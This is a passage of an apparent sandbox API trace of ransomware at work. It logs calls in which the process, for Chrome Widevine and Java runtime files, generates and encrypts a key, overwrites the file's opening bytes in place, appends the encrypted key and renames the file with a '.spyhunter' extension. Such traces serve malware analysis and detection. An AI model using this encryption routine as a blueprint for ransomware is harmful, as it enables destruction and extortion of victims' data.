"c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\_platform_specific\\win_x64\\widevinecdmadapter.dll.sig"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdmadapter.dll.sig.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\_platform_specific\\win_x64\\widevinecdmadapter.dll.sig.spyhunter")) returned 1 [0123.580] GetProcessHeap () returned 0x2c0000 [0123.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0123.580] GetProcessHeap () returned 0x2c0000 [0123.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0123.580] GetProcessHeap () returned 0x2c0000 [0123.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d053b0 | out: hHeap=0x2c0000) returned 1 [0123.580] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf830 | out: pbBuffer=0x25cf830) returned 1 [0123.580] GetProcessHeap () returned 0x2c0000 [0123.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0123.580] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf828*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf828*=0x30) returned 1 [0123.580] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll.sig" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\_platform_specific\\win_x64\\widevinecdm.dll.sig"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0123.583] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll.sig") returned 125 [0123.583] StrStrW (lpFirst="widevinecdm.dll.sig", lpSrch=".txt") returned 0x0 [0123.583] GetProcessHeap () returned 0x2c0000 [0123.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0123.583] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf7ec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf7ec*=0x665, lpOverlapped=0x0) returned 1 [0123.633] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffff99b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0123.633] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x665, lpNumberOfBytesWritten=0x25cf7ec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf7ec*=0x665, lpOverlapped=0x0) returned 1 [0123.633] GetProcessHeap () returned 0x2c0000 [0123.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0123.633] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.633] WriteFile (in: hFile=0x16c, lpBuffer=0x25cf82c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf7ec, lpOverlapped=0x0 | out: lpBuffer=0x25cf82c*, lpNumberOfBytesWritten=0x25cf7ec*=0x4, lpOverlapped=0x0) returned 1 [0123.633] WriteFile (in: hFile=0x16c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf7ec, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf7ec*=0x30, lpOverlapped=0x0) returned 1 [0123.634] CloseHandle (hObject=0x16c) returned 1 [0123.634] GetProcessHeap () returned 0x2c0000 [0123.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0123.634] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll.sig.spyhunter") returned 135 [0123.634] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll.sig" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\_platform_specific\\win_x64\\widevinecdm.dll.sig"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll.sig.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\_platform_specific\\win_x64\\widevinecdm.dll.sig.spyhunter")) returned 1 [0123.635] GetProcessHeap () returned 0x2c0000 [0123.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0123.635] GetProcessHeap () returned 0x2c0000 [0123.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0123.635] GetProcessHeap () returned 0x2c0000 [0123.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3359a0 | out: hHeap=0x2c0000) returned 1 [0123.635] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf828 | out: pbBuffer=0x25cf828) returned 1 [0123.635] GetProcessHeap () returned 0x2c0000 [0123.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0123.635] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf820*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf820*=0x30) returned 1 [0123.635] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\wsdetect.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\wsdetect.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0123.636] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\wsdetect.dll") returned 53 [0123.636] StrStrW (lpFirst="wsdetect.dll", lpSrch=".txt") returned 0x0 [0123.636] GetProcessHeap () returned 0x2c0000 [0123.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0123.636] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf7e4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf7e4*=0x2800, lpOverlapped=0x0) returned 1 [0123.735] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0123.736] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf7e4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf7e4*=0x2800, lpOverlapped=0x0) returned 1 [0123.736] GetProcessHeap () returned 0x2c0000 [0123.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0123.736] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.736] WriteFile (in: hFile=0x16c, lpBuffer=0x25cf824*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf7e4, lpOverlapped=0x0 | out: lpBuffer=0x25cf824*, lpNumberOfBytesWritten=0x25cf7e4*=0x4, lpOverlapped=0x0) returned 1 [0123.787] WriteFile (in: hFile=0x16c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf7e4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf7e4*=0x30, lpOverlapped=0x0) returned 1 [0123.787] CloseHandle (hObject=0x16c) returned 1 [0123.787] GetProcessHeap () returned 0x2c0000 [0123.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0123.788] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\wsdetect.dll.spyhunter") returned 63 [0123.788] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\wsdetect.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\wsdetect.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\wsdetect.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\wsdetect.dll.spyhunter")) returned 1 [0123.788] GetProcessHeap () returned 0x2c0000 [0123.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0123.789] GetProcessHeap () returned 0x2c0000 [0123.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0123.789] GetProcessHeap () returned 0x2c0000 [0123.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed3708 | out: hHeap=0x2c0000) returned 1 [0123.789] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf828 | out: pbBuffer=0x25cf828) returned 1 [0123.789] GetProcessHeap () returned 0x2c0000 [0123.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0123.789] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf820*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf820*=0x30) returned 1 [0123.789] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\w2k_lsa_auth.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\w2k_lsa_auth.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0123.790] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\w2k_lsa_auth.dll") returned 57 [0123.790] StrStrW (lpFirst="w2k_lsa_auth.dll", lpSrch=".txt") returned 0x0 [0123.790] GetProcessHeap () returned 0x2c0000 [0123.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0123.790] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf7e4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf7e4*=0x2800, lpOverlapped=0x0) returned 1 [0123.876] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0123.876] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf7e4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf7e4*=0x2800, lpOverlapped=0x0) returned 1 [0123.876] GetProcessHeap () returned 0x2c0000 [0123.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0123.876] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.877] WriteFile (in: hFile=0x16c, lpBuffer=0x25cf824*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf7e4, lpOverlapped=0x0 | out: lpBuffer=0x25cf824*, lpNumberOfBytesWritten=0x25cf7e4*=0x4, lpOverlapped=0x0) returned 1 [0124.284] WriteFile (in: hFile=0x16c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf7e4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf7e4*=0x30, lpOverlapped=0x0) returned 1 [0124.284] CloseHandle (hObject=0x16c) returned 1 [0124.284] GetProcessHeap () returned 0x2c0000 [0124.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0124.284] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\w2k_lsa_auth.dll.spyhunter") returned 67 [0124.284] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\w2k_lsa_auth.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\w2k_lsa_auth.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\w2k_lsa_auth.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\w2k_lsa_auth.dll.spyhunter")) returned 1 [0124.285] GetProcessHeap () returned 0x2c0000 [0124.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0124.285] GetProcessHeap () returned 0x2c0000 [0124.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0124.285] GetProcessHeap () returned 0x2c0000 [0124.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5fac0 | out: hHeap=0x2c0000) returned 1 [0124.285] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf820 | out: pbBuffer=0x25cf820) returned 1 [0124.285] GetProcessHeap () returned 0x2c0000 [0124.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0124.285] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf818*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf818*=0x30) returned 1 [0124.285] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fontconfig.bfc" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fontconfig.bfc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0124.286] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fontconfig.bfc") returned 55 [0124.286] StrStrW (lpFirst="fontconfig.bfc", lpSrch=".txt") returned 0x0 [0124.286] GetProcessHeap () returned 0x2c0000 [0124.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0124.286] ReadFile (in: hFile=0x16c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf7dc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cf7dc*=0xe56, lpOverlapped=0x0) returned 1 [0124.693] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffff1aa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0124.705] WriteFile (in: hFile=0x16c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xe56, lpNumberOfBytesWritten=0x25cf7dc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cf7dc*=0xe56, lpOverlapped=0x0) returned 1 [0124.705] GetProcessHeap () returned 0x2c0000 [0124.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0124.705] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.705] WriteFile (in: hFile=0x16c, lpBuffer=0x25cf81c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf7dc, lpOverlapped=0x0 | out: lpBuffer=0x25cf81c*, lpNumberOfBytesWritten=0x25cf7dc*=0x4, lpOverlapped=0x0) returned 1 [0124.706] WriteFile (in: hFile=0x16c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf7dc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf7dc*=0x30, lpOverlapped=0x0) returned 1 [0124.706] CloseHandle (hObject=0x16c) returned 1 [0124.706] GetProcessHeap () returned 0x2c0000 [0124.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f05c68 [0124.706] wnsprintfW (in: pszDest=0x2f05c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fontconfig.bfc.spyhunter") returned 65 [0124.706] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fontconfig.bfc" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fontconfig.bfc"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fontconfig.bfc.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fontconfig.bfc.spyhunter")) returned 1 [0124.706] GetProcessHeap () returned 0x2c0000 [0124.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f05c68 | out: hHeap=0x2c0000) returned 1 [0124.707] GetProcessHeap () returned 0x2c0000 [0124.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0124.707] GetProcessHeap () returned 0x2c0000 [0124.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f267f0 | out: hHeap=0x2c0000) returned 1 [0124.707] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf820 | out: pbBuffer=0x25cf820) returned 1 [0124.707] GetProcessHeap () returned 0x2c0000 [0124.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0124.707] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf818*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf818*=0x30) returned 1 [0124.707] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaTypewriterBold.ttf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidatypewriterbold.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0124.707] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaTypewriterBold.ttf") returned 71 [0124.707] StrStrW (lpFirst="LucidaTypewriterBold.ttf", lpSrch=".txt") returned 0x0 [0124.707] GetProcessHeap () returned 0x2c0000 [0124.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0124.708] ReadFile (in: hFile=0x16c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf7dc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cf7dc*=0x2800, lpOverlapped=0x0) returned 1 [0124.817] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0124.817] WriteFile (in: hFile=0x16c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf7dc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cf7dc*=0x2800, lpOverlapped=0x0) returned 1 [0124.817] GetProcessHeap () returned 0x2c0000 [0124.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0124.817] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.817] WriteFile (in: hFile=0x16c, lpBuffer=0x25cf81c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf7dc, lpOverlapped=0x0 | out: lpBuffer=0x25cf81c*, lpNumberOfBytesWritten=0x25cf7dc*=0x4, lpOverlapped=0x0) returned 1 [0124.819] WriteFile (in: hFile=0x16c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf7dc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf7dc*=0x30, lpOverlapped=0x0) returned 1 [0124.819] CloseHandle (hObject=0x16c) returned 1 [0124.819] GetProcessHeap () returned 0x2c0000 [0124.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0124.819] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaTypewriterBold.ttf.spyhunter") returned 81 [0124.819] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaTypewriterBold.ttf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidatypewriterbold.ttf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaTypewriterBold.ttf.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidatypewriterbold.ttf.spyhunter")) returned 1 [0124.832] GetProcessHeap () returned 0x2c0000 [0124.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0124.832] GetProcessHeap () returned 0x2c0000 [0124.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0124.833] GetProcessHeap () returned 0x2c0000 [0124.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7d038 | out: hHeap=0x2c0000) returned 1 [0124.833] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf818 | out: pbBuffer=0x25cf818) returned 1 [0124.833] GetProcessHeap () returned 0x2c0000 [0124.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0124.833] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf810*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf810*=0x30) returned 1 [0124.833] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\logging.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\logging.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0124.835] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\logging.properties") returned 59 [0124.835] StrStrW (lpFirst="logging.properties", lpSrch=".txt") returned 0x0 [0124.835] GetProcessHeap () returned 0x2c0000 [0124.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0124.835] ReadFile (in: hFile=0x16c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf7d4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cf7d4*=0x997, lpOverlapped=0x0) returned 1 [0125.093] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffff669, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.093] WriteFile (in: hFile=0x16c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x997, lpNumberOfBytesWritten=0x25cf7d4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cf7d4*=0x997, lpOverlapped=0x0) returned 1 [0125.093] GetProcessHeap () returned 0x2c0000 [0125.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0125.094] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.094] WriteFile (in: hFile=0x16c, lpBuffer=0x25cf814*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf7d4, lpOverlapped=0x0 | out: lpBuffer=0x25cf814*, lpNumberOfBytesWritten=0x25cf7d4*=0x4, lpOverlapped=0x0) returned 1 [0125.094] WriteFile (in: hFile=0x16c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf7d4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf7d4*=0x30, lpOverlapped=0x0) returned 1 [0125.094] CloseHandle (hObject=0x16c) returned 1 [0125.094] GetProcessHeap () returned 0x2c0000 [0125.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0125.094] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\logging.properties.spyhunter") returned 69 [0125.094] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\logging.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\logging.properties"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\logging.properties.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\logging.properties.spyhunter")) returned 1 [0125.095] GetProcessHeap () returned 0x2c0000 [0125.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0125.095] GetProcessHeap () returned 0x2c0000 [0125.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.095] GetProcessHeap () returned 0x2c0000 [0125.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e60240 | out: hHeap=0x2c0000) returned 1 [0125.095] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf818 | out: pbBuffer=0x25cf818) returned 1 [0125.095] GetProcessHeap () returned 0x2c0000 [0125.095] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.095] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf810*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf810*=0x30) 